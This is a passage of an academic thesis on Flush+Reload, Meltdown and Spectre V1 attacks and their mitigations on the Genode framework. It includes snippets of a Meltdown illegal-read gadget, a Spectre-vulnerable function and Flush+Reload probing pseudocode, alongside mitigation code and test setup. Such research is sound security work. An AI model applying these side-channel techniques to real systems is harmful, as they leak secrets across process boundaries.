A reliable way to measure the time it takes for a value to be accessed is a necessity for acache-based timing channel to be implemented. Paoloni [34] has published guidelines forbenchmarking code execution on Intel 32 and 64-bit architectures. Paoloni describes theuse of the Time-Stamp Counter (TSC) which counts the CPU cycles for measuring time.Intel 32 and 64 bit architectures come with two instructions for reading TSC: rdtsc andrdtscp. Paoloni recommends measurement using the timer in Listing 2.2 which uses theinstructions rdtsc, rdtscp and cpuid to prevent OOE. Yarom and Falkner noted that useof the instruction cpuid may not be desirable for cross Virtual Machine (VM) channels asthe instruction may be emulated by the Virtual Machine Monitor (VMM) [48]. In place of thecpuid instruction they instead use a load fence, a tool which stalls the CPU until all previousloads have resolved. The rdtsc instruction reads the TSC into the CPU registers edx andeax. Similarly, rdtscp reads TSC into these registers but additionally waits for previousinstructions to have executed [34].

Paoloni also suggests an alternative method, presented in Listing 2.3, for when therdtscp instruction is not available.

Listing 2.2: Timer Recommended by Intel

1 cpuid ; Prevent OOE for previous instructions2 rdtsc ; Read TSC into edx, eax3 mov var1, edx, ; Store TSC in var1 and var24 mov var2, eax;5 ; Call measured function here6 rdtscp ; Serialize previous instructions and read TSC7 mov var3, edx ; Store second TSC into var3 and var48 mov var4, edx ;9 cpuid ; Prevent OOE for following instructions

8

2.3. Flush+Reload

Listing 2.3: Alternative Timer Recommended by Intel

1 cpuid ; Prevent OOE for previous instructions2 rdtsc ; Read TSC into edx, eax3 mov var1, edx, ; Store TSC in var1 and var24 mov var2, eax;5 ; Call measured function here6 cpuid ; Serialize previous instructions7 rdtsc ; Read TSC8 mov var3, edx ; Store second TSC into var3 and var49 mov var4, edx ;

10 cpuid ; Prevent OOE for following instructions

2.3 Flush+Reload

Flush+Reload is a cache-based timing channel designed by Yarom and Falkner [48] whichexploits timing of the LLC. Therefore, Flush+Reload does not require that the attacker andvictim run their respective processes´ on the same CPU core. Flush+Reload relies on sharingpages with a victim process, as this allows for Flush+Reload to control caching of these sharedpages [48].

The attack Yarom and Falkner developed works by evicting a specific memory line usingclflush, subsequently letting the victim execute. After the victim has executed the attackercan now check whether the evicted line is once again in cache. Checking whether the valueis in the cache is done by defining a machine-specific time threshold below which values areconsidered cache hits. Yarom and Falkner profiled cache misses using clflush to define thethreshold. Zhou et al. [50] presented a method to choose the threshold for Flush+Reload andconcluded that the threshold should be below the but close to the lower boundary of DRAMaccess times.

Yarom and Falkner note that some CPU optimizations may result in false positives, e.g.speculative execution or data prefetching. Consequently, it is desirable to have strategies tofilter these false positives, Yarom and Falkner do not suggest methods for filtering these falsepositives.

2.3.1 Shared Memory

One requirement for Flush+Reload is the availability of shared memory between the attackerand the victim. Multiple processes can have access to a shared physical memory space inmodern OSs1. One reason for using shared memory is to optimize memory usage whenmultiple processes are using the same library [31]. The OSs may have a library loadedonce into physical memory and reference the memory space with different virtual memoryaddresses. Hence, instead of every process loading the library in its own user space, thelibrary is only loaded once and after that shared by multiple processes. User processes canalso use shared memory for IPC in some OSs [31].

This mechanisms for optimizing used of shared libraries have been used by [48] to extractencryption keys via a Flush+Reload side channel.

Genode has a strict separation between its processes and should, therefore, not optimizethe memory usage by sharing memory [7]. However, a Flush+Reload channel may still beused between to processes sharing memory for IPC2.

1M. T. Jones. Anatomy of Linux dynamic libraries. 2008. URL: https://www.ibm.com/developerworks/linux/library/l-dynamic-libraries/ (visited on 2019-01-17).


9

https://www.ibm.com/developerworks/linux/library/l-dynamic-libraries/

https://www.ibm.com/developerworks/linux/library/l-dynamic-libraries/



2.4. Meltdown

2.3.2 Preventing Data Prefetching

Several techniques have been shown to be effective at preventing data prefetching. Readsusing randomized order or a random-order linked list are techniques which have beensuggested by Liu et al. [32] to prevent data prefetching. Kocher et al. [24], althoughnot explicitly stated, utilize a form of strided reads in their POC, thus preventing dataprefetching. We will denote the form of strided reads used by Kocher et al. as Strided ReadGenerators (SRGs) which can be constructed as

xsi = ai + b mod m

where,a � 1 (mod p)

for all prime factors p in m. For example, choosing a, b and m as

$'&'%

a = 127b = 0m = 256

gives a sequence xsi P t0, 127, 1, 128u from a sequence i P t0, 1, 2, 3u.

2.4 Meltdown

Meltdown is a microarchitectural attack leveraging OOE execution in some modernprocessors to leak memory via a cache covert channel. The OOE execution is used to modifythe contents of the cache; subsequently, the altered cache is read via a covert channel [31].

Lipp et al. [31] describes two practical Meltdown attacks. The first attack described howan attacker could read stored passwords from Firefox running on the same machine [31]. Thesecond attack demonstrated how an attacker could exploit a system to dump the memoryfrom another process, even with Kernel Address Space Layout Randomization (KASLR)active [31]. KASLR is a mechanism which randomizes the kernel space memory layout atboot time [9].

2.4.1 Virtual Address Space

The process executing the Meltdown attack is required to have a virtual memory addresscorresponding to the physical memory address where the targeted data is located. Virtualmemory is designed to isolate processes from each other. Virtual memory also acts as anabstraction from hardware and physical memory, exposing a conceptually infinite space ofmemory [15, p.38].

Hat [15] explains how the virtual address is split, one part indexing a page directory entry,the other indexing an offset within that page. Multiple page directory entries may resolve tothe same physical memory page. Shared memory is commonly implemented in this way, i.e.mapping multiple virtual addresses to the same physical memory address [15, p.38].Figure 2.1 shows the virtual memory map of a process running on 64 bit Linux. The process’smemory space, i.e. user space, is located at the lower address range and the kernel at thehighest address range. In between user and kernel space is unused address space. The layoutof the kernel space is the same for all user processes in Linux. This is done to remove the needof swapping the Memory-Management Unit (MMU) when switching to kernel mode, whichis a costly operation3.

3J. Corbet. KAISER: hiding the kernel from user space [LWN.net]. Nov. 2017. URL: https://lwn.net/Articles/738975/ (visited on 2019-01-22).

10



2.4. Meltdown

0x0000000000000000

User Space

0x0000008000000000

Unused Space

0xFFFFFF8000000000

Kernel Space

0xFFFFFFFFFFFFFFFF

Figure 2.1: A model of virtual memory composition.

2.4.2 Meltdown Attack Description

An attacker can read some data and use this data to index in an array. The attacker couldthen use a covert cache channel to inspect which index in the array was accessed to see whatthe initial data was.

The Meltdown attack is performed in this way; indexing an array with the value froman illegal memory access. This will on most kernels raise a segmentation fault, preventingthe address of being read and triggering signal handling. However, if the CPU uses OOEexecution, the array may be indexed with the data before the signal handling occurs [31].Listing 2.4 shows an example of how the Meltdown attack may work. Here the data from theaddress 0x7ffffdf9d580 is saved to a variable with which the array data is indexed. If OOEexecution is available, the access of data may occur before the signal handling and leave thedata in the cache.

For Meltdown to read a memory address, that address needs to be mapped into theaddress space of the user process, i.e., the user process needs to have access to virtual memorycorresponding to the physical memory of the process under attack [31].

Listing 2.4: Meltdown Memory Access

1 // Illegal memory read2 char ill = * (char*) 0x7ffffdf9d580;3 // PAGE_SIZE offset is to prevent the prefetcher from4 // fetching adjacent data, i.e. so that5 // the exact value of ill can be identified when with Flush+Reload6 data[ill * PAGE_SIZE] = 0;

2.4.3 Proof-Of-Concept Implementation

Lipp et al. [31] created a Proof-Of-Concept (POC) implementation for Meltdown which canbe found on Github4. The control flow of the attack is implemented as follows:

1. Flush the shared array from the cache.

2. Access shared memory array at an address calculated based on the value at the targetedaddress.

3. Recover from the triggered segmentation fault.

4. Test indices in the shared array for a cache hit.

4https://github.com/IAIK/meltdown

11

https://github.com/IAIK/meltdown

2.5. Spectre

Several tools have been used to execute these steps. To flush the targeted address, theclflush instruction has been used [31]. Shared memory is used in the case of Flush+Reload,which is a well-performing side channel [48]. Recovering from the segmentation fault can behandled in Linux via the use of custom signal handlers, or more efficiently via the use ofIntel TSX [31]. For the last step of testing values for cache hits, two methods are presentedhere; test after each read and test all values after a single read. The latter is discussed as twoversions, firstly, testing all values using a mixed order iteration and secondly, to test all valuesusing a large offset. In addition, it is necessary to accurately determine to which cache levela memory access was made. To do this, a high-resolution timer like the TSC can be used [31].They are, however, not necessary as there are techniques to construct a high-resolution timerfrom lower resolution ones [41].

An attacker targeting Genode and microkernels has some limitations related to the toolsdiscussed above. Signal handling of certain signals are not as flexible as needed on Genode,including handling of segmentation faults [7].

Caching of targeted data may pose as an unreasonable prerequisite. Intel TSX has beenutilized in place of signal handling to recover from the segmentation fault; this method hasbeen proven as the most effective [31]. The reason being that there is hardware support forreverting a transaction. Thus, the OS cannot observe that a faulty access was made duringthis transaction [31].

2.4.4 Mitigations

There have been efforts to mitigate both Meltdown and Spectre in software; consequently,there is a need to present which mitigations exist, how they work and how they are applied.

Lipp et al. described how the Kernel Address Isolation to have Side Channels EfficientlyRemoved (KAISER) patch mitigates Meltdown by removing the kernel map from user spaceand, therefore, removes Meltdown’s ability to access kernel memory [31]. KAISER has nowbeen renamed to Kernel Page-Table Isolation (KPTI) and was introduced in version 4.15-rc4of the Linux kernel5. Prout et al. [36] found that KPTI slowed down disk accesses by up to50% due to increased execution time of a user-to-kernel context switch.

2.4.5 Meltdown on Genode

Genode’s founder Feske6 has discussed the implications of Meltdown on Genode. Feskestated that due to the minimalistic responsibilities of the microkernel, there is not as muchinformation to leak from the kernel. Furthermore, the only memory pages shared betweenuser applications and the kernel are thread control blocks. This limits the accessibleinformation through shared LLC. Feske also suggested that the Meltdown attack should betested on different kernels to get a complete picture of what information can be leaked.

Genode’s signal handling is not as adaptable as the one in Linux. An attacker cannotinstall a custom handler for the segmentation fault [7]. Consequently, the attacker cannotrecover from a segmentation fault in this way.

2.5 Spectre

Spectre is a class of microarchitectural attack leveraging speculative execution on somemodern processors [24]. Spectre attacks can be used to read memory from other userprocesses or the kernel. Kocher et al. [24] described four different attacks; in this thesis, wewill focus on the attack exploiting conditional branches Spectre Version 1 (Spectre V1).

5J. Corbet. The current state of kernel page-table isolation [LWN.net]. Dec. 2017. URL: https://lwn.net/Articles/741878/ (visited on 2019-01-23).


12





2.5. Spectre

2.5.1 Spectre V1 Attack Description

Spectre V1 exploits speculative execution to bypass conditional branches. To execute SpectreV1, an attacker first needs to find a vulnerable function in another process. One example ofa vulnerable function can be seen in Listing 2.5. For this example to work, shared_arrayneeds to point on memory shared by the attacker and the victim. This example function isvulnerable to a SCA which can allow an attacker to read the private_array, but by usingSpectre V1, an attacker could also read data outside private_array.

An attacker can by calling the function read_data many times with idx smaller thanthe size of private_array train the CPU to speculatively evaluate the condition on line2 to true and furthermore, execute line 3. The speculative execution can be triggered if thevariable size_of_private_array is not cached and, therefore, takes hundreds of CPUcycles to fetch. If the CPU after this speculative execution evaluates the condition on line 2to false, line 3 is never committed. The speculative execution may still have left data in thecache which may be read by the attacker using Flush+Reload or another cache-based SCA.

Listing 2.5: A function which is vulnerbale to Spectre V1.

1 void read_data(unsigned int idx){2 if (idx < size_of_private_array)3 dummy = shared_array[private_array[idx]]4 }

2.5.2 Spectre V1 Mitigations

Spectre V1 relies on speculative execution for its exploit, thus, a straight forward approach formitigation would be to disable speculative execution. Disabling speculative execution may,however, degrade performance according to Kocher et al. [24]. Another strategy proposed byKocher et al. is to apply a bitmask to the index, effectively forcing the index to be within thebounds of the array. This method, due to dependant computations, does not allow for thearray access to be invalid [19].

2.5.2.1 Preventing Speculative Execution

Intel recommends the use of the lfence instruction to prevent speculative executionas it serializes instructions and has good performance over other serializing instructions[18].Listing 2.6 shows how the lfence instruction can be applied to mitigate Spectre V1in the vulnerable function.

Listing 2.6: A function which was vulnerable to Spectre V1 after the load fence mitigation hasbeen applied.

1 void victim(size_t idx) {2 if(idx < array_size) {3 _mm_lfence(); // Guaranteed to be executed4 int foo = array[idx]; // after condition is evaluated5 do_something(foo);6 }7 }

Microsoft have added a feature in their MSVC compiler which allows the compiler to adda speculative code execution barrier, similar to lfence. This mitigation should have anegligible impact on performance according to Microsoft7.

7Microsoft. “/Qspectre”. In: (Oct. 2018). URL: https://docs.microsoft.com/en-us/cpp/build/reference/qspectre?view=vs-2019 (visited on 2019-04-16).

13

https://docs.microsoft.com/en-us/cpp/build/reference/qspectre?view=vs-2019

https://docs.microsoft.com/en-us/cpp/build/reference/qspectre?view=vs-2019

2.5. Spectre

2.5.2.2 Index Bitmasking

Stuart [43] showed a Spectre V1 mitigation which used bit operations to remove thepossibility of indexing outside the array. Listing 2.7 shows an example of a function whichuses these bit operations to mitigate a Spectre V1 attack. Line 4 in the Listing sets maskto a negative number if size >= idx. The OR operation on line 4 prevents an attackfrom overflowing the conversion8. After right shifting in line 6 mask will contain only 0sif size < idx or else only 1s. This code is dependent on arithmetic right shift, which isimplementation-defined9, and thus depends on the compiler and architecture. Line 8 invertsmask to simplify the operation on line 10, where idx is OR:d with either 0s, if idx >= sizeor else 1s. Hance, the array cannot be indexed with a value greater or equal to size.

Listing 2.7: A function which was vulnerable to Spectre V1 after the bitmask mitigation hasbeen applied.

1 void victim(unsigned long idx) {2 // unsigned long size3 if (idx < size){4 // Set mask to negative number if size >= idx5 long mask = idx | (size - 1 - idx);6 // mask = 0x000.... if mask < 0 else 0xFFF...7 mask >>= (sizeof(long) - 1); // arithmetic right shift8 // mask = 0xFFF... if mask = 0x000... else 0x000...9 mask = ~(mask);

10 // idx & mask = idx if mask = 0xFFF... else 011 int foo = array[idx & mask];12 }13 }

A mitigation similar to the one described in Listing 2.7 has been implemented in the Linuxkernel10, see Listing 2.8. This mitigation uses two instructions to perform the bit masking.The first instruction, "cmp %1,%2", sets the carry flag to 1 if size < idx. The nextinstruction, "sbb %0,%0;", sets mask either to -1, if the carry flag is set, or 0 otherwise.Consequently, array_index_mask_nospec will return 0x00000000 if idx >= sizeand 0xFFFFFFFF otherwise. OR:ing idx with the returned value will give either idx ifidx is in range and 0 otherwise.

8J. Corbet. Meltdown/Spectre mitigation for 4.15 and beyond [LWN.net]. Jan. 2018. URL: https://lwn.net/Articles/744287/ (visited on 2019-03-25).

9Arithmetic operators. URL: https://en.cppreference.com/w/c/language/operator_arithmetic(visited on 2019-03-25).

10D. Williams. x86: Implement array_index_mask_nospec. Jan. 2018. URL: https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/commit/?id=babdde2698d482b6c0de1eab4f697cf5856c5859(visited on 2019-03-26).

14



https://en.cppreference.com/w/c/language/operator_arithmetic

https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/commit/?id=babdde2698d482b6c0de1eab4f697cf5856c5859

https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/commit/?id=babdde2698d482b6c0de1eab4f697cf5856c5859

2.6. Performance

Listing 2.8: A function which was vulnerable to Spectre V1 after the built-in Linux kernelmitigation has been applied.

1 /* Source from2 * https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git3 * commit = babdde2698d482b6c0de1eab4f697cf5856c58594 */5 static inline unsigned long6 array_index_mask_nospec(unsigned long idx, unsigned long size) {7 unsigned long mask;8 asm ("cmp %1,%2;" "sbb %0,%0;"9 :"=r" (mask) :"r"(size),"r" (index)

10 :"cc");11 return mask;12 }1314 void victim(unsigned long idx) {15 // unsigned long size16 if (idx < size){17 idx &= array_index_mask_nospec(idx, size);18 int foo = array[idx];19 }20 }

2.6 Performance

In order to evaluate the performance impact of mitigations against Spectre on RPC, thereis a need for a basic understanding of IPC performance and microkernel performance.In addition, we present criticism against microkernel performance and performance ofmonolithic designs.

2.6.1 Microkernel Performance

Lameter [26] has looked at the performance of a monolithic Linux kernel compared to anabstract microkernel and discusses the microkernels inability to scale with increasing countsof processes.

2.6.2 IPC Performance

Immich et al. [17] performed the analysis by measuring the time it took for two processes toexchange messages over the different IPC mechanisms, to get the current time the functiongettimeofday was used since it provides microsecond accuracy. A similar study hasbeen done for Sel4:s current IPC [49], which examined overhead of allocating different IPCmechanisms as well as execution time for using them.

2.7 Related Work

Genode is not the only issue of process separation and resource limitation, for a goodunderstanding of the benefits and disadvantages of microkernels, the alternative solutionsneed to be understood. Besides, there is a body of work relating to Genode and security whichis not relevant to microarchitectural attacks specifically but which do motivate an interest toinvestigate them.

15

2.7. Related Work

2.7.1 Genode

Genode has seen work related to security, Constable et al. [5] worked on extendingformal Sel4 verification to Virtual Machine Monitor (VMM) running on Genode. Langeet al. [28] used Genode and a microkernel to form a secure encapsulation of smartphoneOSs. Waddington et al. [46] implemented a high performance web-cache usingGenode+Fiasco.OC. Hamad and Prevelakis [13] measured IPsec performance on Genoderunning on Rasperry PIs.

Several other works have focused on using Genode as a means to achieve a secureOS. Brito et al. [1] used Genode as a secure kernel base to process images securely onan ARM TrustZone cloud environment. Ribeiro et al. [38] used Genode to construct aTrustzone-backed database management system. Ramos [37] proposed the development ofa toolkit, using Genode as a base, easing development of Trustzone projects. Harp et al. [14]recommends a reference architecture ISOSCELES for medical devices building on Genode,using either Nova or Sel4 as a microkernel base. Hamad et al. [12] used Genode to implementa secure intra-vehicle communication framework, utilizing its IPC mechanisms for efficientmessage passing.

Genode has seen little work related to microarchitectural attacks and side channels.Schmidt et al. [39] constructed a covert channel in Genode which exploited a software cacheto construct a timing channel. However, to the best knowledge of the authors, there has beenno other work relating to SCAs in Genode.

2.7.2 Side Channels

Xiao et al. [47] demonstrate a covert channel using execution time for write accesses to sharedmemory pages. They leverage the Copy-On-Write (COW) technique, which is commonlyused for shared memory implementations. COW copies the requested page and writes to thecopy on demand, thus revealing if a page is shared or not by measuring the time of executinga write [47]. Xiao et al. [47] also demonstrate, using this technique, examples of a covertchannel transmitting 50-90 bps for practical applications.

Pessl et al. [35] present a covert cross CPU channel utilizing varying access times ofmemory banks in DRAM. They demonstrated a channel with a capacity of 2.1 Mbps withan error probability of 1.8% and across VM channel with a capacity of 596 kbps with an errorprobability of 0.4%

2.7.3 Microarchitectural Attacks

Mcilroy et al. [33] examined the deep seated implications of how Spectre and incorrecthardware models affect confidentiality-enforcing programming languages. Mcilroy et al.showed that that these confidentiality guarantees are completely compromised by Spectre.Koruyeh et al. [25] showed that the Return Stack Buffer (RSB) could be exploited instead ofthe BPU, thus introducing a class of SpectreRSB attacks. Koruyeh et al. were not successful indemonstrating these attacks on ARM and AMD CPUs. However, ARM and AMD CPUs alsoutilize an RSB and should therefore be vulnerable.

There has also been work examining SCAs targeting ARM Trustzone. Lapid and Wool [29]mounted a side-channel cache attack against the ARM32 AES implementation used by theKeymaster trustlet. Another work by Bukasa et al. [3] showed the ineffectiveness of Trustzoneto prevent power analysis SCAs.

Microarchitectural attacks are also a quickly progressing field. A recent work by Schwarzet al. demonstrated the ZombieLoad attack, a new type of microarchitectural attack whichexploits a fill buffer to read data from other processes [40]. This fill buffer is a type of loadqueue which is shared between hyper threads. This buffer can under certain circumstancestrigger a load which has been initially issued on another core and thereby can leak data fromloads issued by other processes [40].

16

2.7. Related Work

2.7.4 Linux Control Groups

The Linux kernel implements limitation of resources in the form of control groups (cgroups).According to the man-page for cgroups:

"A cgroup is a collection of processes that are bound to a set of limits or parametersdefined via the cgroup filesystem." [4]

Cgroups can restrict the use of resources like CPU and memory for processes in a cgroup.Cgroups may also provide guarantees of CPU time for processes in a group. However, unlikeGenode, cgroups do not allow non-root processes in a cgroup to have children of their own[4].

2.7.5 Security by Virtualization

Using a small kernel is not the only way to potentially enhance the security of a system.Another feasible option is to use different virtual systems to separate processes. The virtualsystems need to be running on a hypervisor, which may be attacked. Thongthua andNgamsuriyaroj [44] discusses some weaknesses they found in popular hypervisor software.However, the abstraction of virtualization does not prevent microarchitectural attacks suchas Meltdown or Spectre [31, 24]. Irazoqui et al. [21] recovered an AES key in a cross-virtualmachine setup using a SCA that abused the LLC. The attack is not dependent on the virtualmachine running on the same core since the LLC cache was used. Virtualization also adds tooverhead by handling multiple OSs running on the hardware.

17

3 Method

This chapter first begins by presenting how the tested system was set up, including howoutput was obtained, how the kernels were set up with Genode and how they were booted.Secondly, presents the design and measurement method used for the covert Flush+Reloadchannel. Thirdly, the design of the Meltdown attack and Spectre V1 attack is presented.Lastly, the methodology for measuring the performance impacts of Spectre V1 mitigationsis presented.

3.1 Setting up System Under Test

The System Under Test (SUT) is composed of Genode with a microkernel core, an attackimplementation and an output channel. This setup was executed on an Intel Core i5-7500CPU.

We used Genode’s build tools and documentation to build our implementation for eachkernel 1. These build tools were available at Genode’s Github page 2. To run a build, Genoderequires an init-component which is assigned all system resources. Genode then delegates thetask of assigning resources to this init-component. We build our implementation by assigningan initial resource budget to our process, thus enabling it to execute, use RPC and allocatememory. Figure 3.1 shows how the init process may start and delegate resources to two userprocesses. Genode’s build tools will from our configuration create files which are used toboot the kernel with our implementation. These files can be used by Grub2 to multi-boot thetested SUT.

3.1.1 Using x86 Intrinsics

The content from the file:/genode-gcc/lib/gcc/x86_64-pc-elf/6.3.0/include/mm_malloc.h,

was removed due to a compiler error. This was needed to allow for the use of the library file<x86intrin.h>, which supports instructions for the rdtsc and lfence instructions.

1https://genode.org/documentation/developer-resources/index2https://github.com/genodelabs/genode/tree/18.11

18

https://genode.org/documentation/developer-resources/index

https://github.com/genodelabs/genode/tree/18.11

3.1. Setting up System Under Test

Microkernel

Genode

Init

User proc. 1 User proc. 2RPC

Figure 3.1: Overview of Genode’s Hierarchy

3.1.2 Obtaining Output

Serial communication was used between the system under test and another computer toobtain output from the attacking application, see Figure 3.2. This was done to obtain output,as Genode does not include a graphical user interface per default. Instead, the defaultbehavior of Genode is to forward all log events to the serial port.

To configure the serial port a modification of Bender was needed. Bender is a small kernelwhich is used to boot the host kernel. Per default, on boot, Bender finds a serial port andsaves the address of this port to a specific memory address [7]. After that, Bender boots themicrokernel and Genode. Genode can now look at that address to know which serial port toforward all logs to.

Serial communicationOutput to monitor

Measuring System Test System

Figure 3.2: The communication setup to retrieve output from the tested system.

Bender did not choose the correct serial port on the tested PC and was therefore modified toselect a serial port in use. The used Bender version can be found at Alexander Boettcher’sGithub page 3.

We changed the <bender.c> file 4 so that com0_port was chosen to 0x3f8. Where0x3f8 is the address to the serial port on the test PC, as shown by running the commanddmesg in Linux. The change made to Bender can be seen in Listing 3.1 and 3.2.

3https://github.com/alex-ab/morbo/tree/e4744198ed481886c48e3dee12c1fbd47411770f4https://github.com/alex-ab/morbo/blob/cb5ec9453af8e7f5d63289aa1884106ce95b4a36/

standalone/bender.c

19

https://github.com/alex-ab/morbo/tree/e4744198ed481886c48e3dee12c1fbd47411770f

https://github.com/alex-ab/morbo/blob/cb5ec9453af8e7f5d63289aa1884106ce95b4a36/standalone/bender.c

https://github.com/alex-ab/morbo/blob/cb5ec9453af8e7f5d63289aa1884106ce95b4a36/standalone/bender.c


Listing 3.1: Genode’s Default Bender

if (!serial_ctrl.cfg_address&& !iobase&& serial_ports(get_bios_data_area())&& serial_fallback)

{

*com0_port = 0x3f8;

*equipment_word = (*equipment_word & ~(0xF << 9)) | (1 << 9);}

Listing 3.2: Genode’s Bender After Applied Changes

/* if (!serial_ctrl.cfg_address&& !iobase&& serial_ports(get_bios_data_area())&& serial_fallback)

{ */

*com0_port = 0x3f8;

*equipment_word = (*equipment_word & ~(0xF << 9)) | (1 << 9);//}

3.1.3 Building and Running on Nova

Genode’s build tool created the files hypervisor and image.elf.gz when an applicationwas compiled for Genode+Nova. These files were located at:

<genode_build_dir>/var/run/spectre/boot,if an application named "spectre" was compiled. These files can be used in Grub2 toboot the kernel on bare hardware. Grub2 can be configured to boot Nova by adding themenu entry shown in Listing 3.3, where <boot> is the folder containing hypervisor andimage.elf.gz.

Listing 3.3: Grub2 Menu Entry for Nova

1 menuentry ’Genode Spectre Nova’ {2 insmod multiboot23 insmod gzip4 multiboot2 <...>/bender # Path to modified bender binary.5 module2 <boot>/hypervisor hypervisor iommu nopid novga serial6 module2 <boot>/image.elf.gz image.elf7 }

3.1.4 Building and Running on Okl4

Genode’s build tool created the file image.elf when an application was compiled forGenode+Okl4. This file was located at:

<genode_build_dir>/var/run/spectre/boot,when and application name "spectre" was compiled. This file can be used with Grub2 to bootthe kernel on bare hardware. Grub2 can be configured to boot Okl4 by adding the menu entryshown in Listing 3.4, where <boot> is the folder containing image.elf.

20


Listing 3.4: Grub2 Menu Entry for Okl4

1 menuentry ’Genode Spectre Okl4’ {2 insmod multiboot23 multiboot2 <...>/bender # Path to modified bender binary.4 module2 <boot>/image.elf5 }

Our application did not build on Okl4 by using the default build file. We added march=native to compile programs containing assembly instructions. The march=native flagtells the compiler to tailor the assembly instruction set for the used CPU5.

3.1.5 Building and Running on Linux

The output from the Genode application was forwarded from the terminal to the serial port.This was done to use the same measurement methodology as for the two other kernels.

3.1.6 Measuring Throughput

To measure the channel’s or the attacks’ throughput, a fixed string message m of length n wastransmitted. Throughput T was then calculated as the number of correctly transmitted bytesper second (Bps) of transmission. This definition of throughput has been used to measureother microarchitectural attacks [31, 25]. A byte in position i was considered correctlytransmitted if the received byte ri had the same value as the message byte mi. The throughput,T, was calculated as:

T =

°ni=0 C(mi, ri)

tn(3.1)

, where

C(m, r) =

#1 if r = m0 otherwise

, andtn = Total execution time in seconds

T = Throughput of the channel

C(m, r) = Function to determine equality of bytes

. An array of size 2048 bytes was used to measure throughput. Every leaked byte wasforwarded via serial communication to the measuring system, see Figure 3.2. Each sent bytewas then compared to the correct byte, see Equation (3.1).

Genode’s timer object was used in Nova and Linux to measure the total execution time,tn, with millisecond accuracy. Some changes need to be made to the Genode-application runfile, where timer needs to be added to build and build_boot_image. The timer objectwas not used on Okl4; instead, a timer at the measuring system was used to measure tn. OnOkl4, a start-timer command was transmitted via the serial port before the first transmissionbyte and an end-timer command after the last byte. The timer on the measuring systemwas started and stopped by these commands. The execution time, tn was transmitted aftertransmitting all bytes if Genode’s timer object was used.

5Using the GNU Compiler Collection (GCC): x86 Options. URL: https://gcc.gnu.org/onlinedocs/gcc/x86-Options.html (visited on 2019-03-25).

21

https://gcc.gnu.org/onlinedocs/gcc/x86-Options.html

https://gcc.gnu.org/onlinedocs/gcc/x86-Options.html

3.2. Implementing the Flush+Reload Channel

3.2 Implementing the Flush+Reload Channel

To answer Research Question 1, we will first demonstrate that Flush+Reload can be used tocreate a covert channel between two processes in Genode. To verify the result, we constructtwo conspiring processes which utilizes Flush+Reload in order to communicate a message.

Shared memory, allocated to a size of (256 + 2) * Padding, was used for theFlush+Reload channel. There were 256 addresses to distinguish addresses as different values.These addresses were offset using a padding to prevent prefetching between values. Paddingwas also used at the beginning and at the end of the array to prevent prefetching of sharedmemory addresses from accesses outside of the array.

In Figure 3.3, this design is used to transmit the values by caching the correspondingaddress. The receiver, pictured in the figure, can then measure access times to each addressin the array and conclude which corresponding value was transmitted.

Padding Padding

0 1 254 255254 is the answer!

Receiver

Miss Hit!

Figure 3.3: A receiver observing access times for a cache hit on a Flush+Reload channel, builton a contiguous padded array.

3.2.1 Measuring Cache Hits

A threshold was used to decide whether a value was cached or not cached. This thresholdwas determined by profiling the time it took for the CPU to access cached and uncachedvalues [48]. The L1 cache or LLC was used depending on the attack design. Therefore, twothresholds were defined. One threshold above the L1 cache and one above the LLC.

We assume a memory model of access times as shown in Figure 3.4. In this figure, tLLCis the upper bound for the LLC and tL1 is the upper bound to access the L1 cache. Thethresholds tLLC and tL1 are chosen as the upper bound of the measurements for the LLC andL1 cache respectively. This choice was made arbitrarily, with the intent of minimizing falsepositives while preserving true positives.The time to access a value was measured using the timing function described in Section 2.2.2.To profile uncached accesses, an array of size 4096 � (256 + 2) was used. An internal paddingof 4096 bytes was used to prevent prefetching.

The time of accessing uncached values was measured by first removing the array fromthe cache, using clflush. Then measuring the time for accessing each address. A similarmethod was used to measure the timings for the L1 cache, the difference being that the valueswere cached in the same process before timing the access.

Two processes were used to measure the access times to the LLC, one process whichcached the values and one process which timed the access time, see Figure 3.5. If the two

22


DRAM

LLC

tLLC

L1

tL1Acc

ess

Tim

eÑ

Figure 3.4: A model of memory access times for different memory levels.

: Measuring Process : Caching Process

RPC_shared_memory()

Shared_memory_cap

Lock

Cache current index

Unlock

Flush current value

Tell caching process to start

Wait for unlock

Measure fetch time

Loop

Figure 3.5: A sequence diagram for measurements of the LLC access times.

processes get scheduled on the same core, the values may be cached in either the L1 cache orthe LLC.


The in-order loop in Listing 3.5 triggers the CPU to prefetch addresses before they areaccessed, resulting in cache hits. This will result in false-positive cache hits for subsequentvalues. The example in Listing 3.6 on the other hand flushes all possible values and thenmeasures the access time out of order to prevent data prefetching.

Listing 3.5: Flush+Reload

1 for i in 0...2562 clflush(address + i*Padding) // Flush channel from cache3 wait_for_read() // Wait for reloading process4 for i in 0...2565 time(address + i*Padding) // Test value for cache hit

23


Listing 3.6: Flush+Mix

1 for i in 0..2552 clflush(address + i*Padding) // Flush channel from cache3 wait_for_read() // Wait for reloading process4 for i in 0..255 //5 m = (i * a + b) % 256 // a and 256 relatively prime6 t = time(leak + m*Padding) // Test value for cache hit7 if t < LLC_THRESHOLD8 cache_hits += 1

The offset Padding is used as internal padding to prevent prefetching between values, 4kB was chosen as the biggest internal padding, as it is the size of pages on the tested systemand that the CPU does not prefetch across page boundaries [24, 10]. An example of the arrayused for the channel can be seen in Figure 3.6, where 4kB internal padding is used.

Padding Padding

0 kB 4 kB

0

8 kB

1

1020 kB

254

1024kB

255

1028 kB

Figure 3.6: Leak Array Layout

SRGs are tested for the best performance of preventing prefetching, measured as no detectedcache hits when looping over the array. The SRGs are chosen as m = 256 where a and b inListing 3.6 are chosen according to the scheme in Section 2.3.2. The SRGs are evaluated byiterating over an array 256 times using indices generated from the SRG. Each access time ismeasured and checked for a cache hit, as described in Section 3.2.1. The SRGs were furtherevaluated for the padding sizes 4096, 2048, 1024, 512, 256 and 128. The limits 4096 and 128were used as they are the page size and cache line size on the tested system. Consequently,the CPU does not prefetch for padding sizes over 4096 bytes and padding below 128 bytesdoes not guarantee separation between values.

All SRGs where a P [1, 255] and b = 0 were evaluated. The offset b = 0 was chosen as aconstant offset should not affect prefetching and to limit the number of SRGs to evaluate. TwoSRGs are presented, the one with the best performance in Equation (3.2) and an arbitrarilychosen worse SRG in Equation (3.3). The second is used to illustrate the characteristics of apoor performance SRG.

mi = 49i + 0 mod 256 (3.2)

mi = 33i + 0 mod 256 (3.3)

3.2.3 Adapting the Channel to Targeted Kernels

